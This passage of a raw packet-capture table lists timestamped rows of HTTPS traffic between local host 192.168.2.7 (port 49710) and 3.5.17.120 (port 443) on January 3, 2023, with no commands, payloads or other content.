Jan 3, 2023 16:29:20.429914951 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.429944038 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.429979086 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.429979086 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430095911 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430160999 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430182934 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430205107 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430238008 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430262089 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430274963 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430290937 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430351973 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430383921 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430383921 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430402994 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430557966 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430607080 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430628061 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430689096 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430696964 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430732965 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.430772066 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430797100 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.430963993 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431030035 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431056976 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431082010 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431116104 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431116104 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431221008 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431323051 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431346893 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431349993 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431411982 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431413889 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431435108 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431449890 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431456089 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431485891 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431508064 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431515932 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431528091 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431556940 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431591034 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431627035 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431653976 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.431938887 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.431966066 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432024956 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432033062 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432060003 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432094097 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432094097 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432221889 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432250977 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432303905 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432332039 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432359934 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432405949 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432578087 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432601929 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432673931 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432678938 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432699919 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432706118 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432714939 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.432740927 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432776928 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.432800055 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.433053970 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.433149099 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.433182955 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.433563948 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.433592081 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.433661938 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.433705091 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.433736086 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.434093952 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.434119940 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.434216022 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.434241056 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.434365034 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.434391022 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.434413910 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.434473991 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.434506893 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.434578896 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.434604883 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.434628010 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.434737921 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.437866926 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.465996027 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.466089964 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.466188908 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.466207981 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.466284990 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.466300011 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.466300011 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.511615038 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.566119909 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.566174984 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.566257954 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.566271067 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.566293955 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.566307068 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.566333055 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.568856955 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.568900108 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.568981886 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.569016933 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.569044113 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.569370985 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.569399118 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.569446087 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.569468975 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.569490910 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.569493055 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.569546938 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.569562912 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.569737911 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.569777012 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.569806099 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.569823980 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.569844007 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.570142984 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.570219040 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.570225954 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.570282936 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.570287943 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.570303917 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.570346117 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.570527077 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.570558071 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.570605993 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.570614100 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.570631981 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.570642948 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.570662975 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.570987940 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.571027040 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.571064949 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.571085930 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.571109056 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.571286917 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.571362972 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.571372032 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.571393013 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.571433067 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.571455002 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.571769953 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.571810007 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.571918964 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.571939945 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.571989059 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.573098898 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.580080032 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.580118895 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.580174923 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.580200911 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.580215931 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.580445051 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.580482960 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.580516100 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.580532074 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.580559969 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.580832958 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.580904961 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.580912113 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.580951929 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581018925 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.581232071 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581276894 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581299067 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.581299067 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.581319094 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581360102 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.581384897 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.581394911 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581604958 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581636906 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581686974 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.581703901 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581718922 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.581780910 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581830978 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581852913 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.581892014 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581907988 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.581908941 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.581964016 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.582262039 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.582298994 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.582340956 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.582355022 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.582371950 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.582396030 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.582406998 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.582608938 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.582643032 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.582679033 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.582705975 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.582823992 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.583004951 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.583039045 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.583081961 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.583095074 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.583127022 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.583404064 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.583437920 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.583471060 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.583483934 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.583525896 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.583817005 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.583868027 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.583894014 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.583915949 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.583933115 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.583961964 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.584264994 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.584297895 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.584347010 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.584350109 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.584363937 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.584388018 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.584404945 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.584676981 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.584711075 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.584743977 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.584754944 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.584775925 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.584986925 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585062981 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585072994 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.585097075 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585134029 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.585161924 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.585319996 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585355043 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585403919 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.585412979 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585432053 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585433960 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.585472107 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.585635900 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585673094 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585714102 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.585728884 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.585757971 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.585952044 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586004019 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586036921 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.586044073 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586057901 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586071014 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.586106062 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.586334944 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586369991 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586426020 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.586427927 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586445093 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586447954 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.586476088 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.586662054 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586709976 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586751938 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.586766005 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.586783886 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.587039948 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.587069035 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.587120056 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.587142944 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.587161064 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.587435961 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.587472916 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.587529898 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.587543964 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.587544918 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.587763071 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.587785959 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.587840080 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.587857008 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.587872982 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.588105917 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.588140965 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.588188887 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.588203907 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.588222980 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.588560104 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.588586092 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.588641882 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.588654995 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.588670969 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.588984966 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.589019060 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.589082003 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.589101076 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.589116096 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.589395046 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.589421034 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.589488029 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.589517117 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.589534998 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.589859009 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.589890957 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.589943886 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.589960098 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.589993954 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.590321064 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.590354919 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.590420961 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.590437889 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.590459108 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.590759993 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.590790987 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.590846062 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.590862036 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.590878010 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.591159105 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.591238022 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.591280937 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.591291904 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.591419935 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.591419935 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.591790915 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.591825962 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.591883898 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.591907024 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.591922998 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:20.591938972 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:20.636748075 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.101893902 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.101922989 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.101967096 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.102026939 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.102087021 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.102089882 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.102111101 CET	443	49710	3.5.17.120	192.168.2.7
Jan 3, 2023 16:29:21.102134943 CET	49710	443	192.168.2.7	3.5.17.120
Jan 3, 2023 16:29:21.102195024 CET	443	49710	3.5.17.120	192.168.2.7
